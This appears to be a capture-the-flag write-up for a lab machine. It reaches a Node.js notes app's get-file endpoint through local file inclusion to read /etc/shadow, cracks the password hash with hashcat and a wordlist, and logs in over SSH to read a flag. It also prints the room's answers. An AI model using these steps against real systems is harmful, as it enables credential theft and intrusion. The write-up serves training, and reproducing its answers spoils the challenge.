Elf Charlie likes to make notes and store them on his server. Are you able to take advantage of this functionality and crack his password?
Read the supporting materials here.
Setup
```
kali@kali:~$ nmap -A -vv 10.10.45.154

22/tcp open ssh  syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 27:97:56:c6:7d:87:00:2d:a3:9c:90:60:9c:17:ae:8d (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCpcxSjvRT07NjHQOXap9xTO5mWnscMVSvlwVNNn3FT9phbKzzsD3ZXnIYcUHTIak8wKlGnSBmgjlVCgbzebvZDprNrjFDzQZZ+GX2ZJ+GtsPTZIbf3ynYVPfeLBdfuYYnkwf4U2o4em4CRSGzd+MUuLGNYMcKOC9h0g7kU4NybDVwgT6W9KDNeBqzd1oOnSj26hvYTO2N+6vIfwyIFrzASBp/1Sjy830vQdobpzL9r4Cb7sG8cBx1qw5iy6ImZXrRFt33+hNFCcMDr0XUMcw+6xvoEfWDAZoEqCRUaRKtDEcGnENW3NPG/YMhqXNoYq6qLzLIUnwzj3n2wEV/JCULj
|   256 3b:4c:29:10:da:0b:17:6c:ba:de:d0:66:66:20:c5:df (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGzgpJOUVURY/Wfz66y/OR17GgMyN05IcMVmVO2wE560O/KwqqX0qmlIZ60fjqpTd8dXXD2oYY4mUju4kh1hYTk=
|   256 15:70:d4:d5:aa:b6:4f:98:7f:2d:90:d8:b7:74:88:a6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB5uDVGTfyLrVZrQzYS+YZJBtTBRFNLwueR4k+/DYdjp

80/tcp open http syn-ack Node.js (Express middleware)
|_http-favicon: Unknown favicon MD5: DBC69DB56435575CDC5CF45C96045958
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Public Notes
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
#1 What is Charlie going to book a holiday to?

```
Hawaii
```
#2 Read /etc/shadow and crack Charlie's password.
If we check the source code of the webpage:

```html
<script>
  function getNote(note, id) {
    const url = '/get-file/' + note.replace(/\//g, '%2f')
    $.getJSON(url, function(data) {
      document.querySelector(id).innerHTML = data.info.replace(/(?:\r\n|\r|\n)/g, '<br>');
    })
  }
  // getNote('server.js', '#note-1')
  getNote('views/notes/note1.txt', '#note-1')
  getNote('views/notes/note2.txt', '#note-2')
  getNote('views/notes/note3.txt', '#note-3')
</script>
```
Now let's fire up Burp Suite and make some LFI :D


Now that we have Charlie's password hash, let's crack it!
```
# Hash to decode
$6$oHymLspP$wTqsTmpPkz.u/CQDbheQjwwjyYoVN2rOm6CDu0KDeq8mN4pqzuna7OX.LPdDPCkPj7O9TB0rvWfCzpEkGOyhL.
```

```
sudo hashcat -m 1800 -a 0 --force -o crack.txt hash.txt /usr/share/wordlists/rockyou.txt
```

```
kali@kali:~$ sudo cat crack.txt
"password1"
```
#3 What is flag1.txt?
Let's access the machine now with Charlie's password:
```
kali@kali:~$ ssh charlie@10.10.45.154

The authenticity of host 10.10.45.154 (10.10.45.154) can't be established.
ECDSA key fingerprint is SHA256:FTprTqjO/Yb1cVxlvn/P9VvlOeZMFbs4eQwOOTUqhg4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.45.154' (ECDSA) to the list of known hosts.

charlie@10.10.45.154's password: "password1"
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-1092-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

65 packages can be updated.
32 updates are security updates.

Last login: Fri Dec 13 21:44:29 2019 from 10.8.11.98

charlie@ip-10-10-45-154:~$
```

```
charlie@ip-10-10-45-154:~$ ls
flag1.txt
charlie@ip-10-10-45-154:~$ cat flag1.txt
'THM{4ea2adf842713ad3ce0c1f05ef12256d}'
```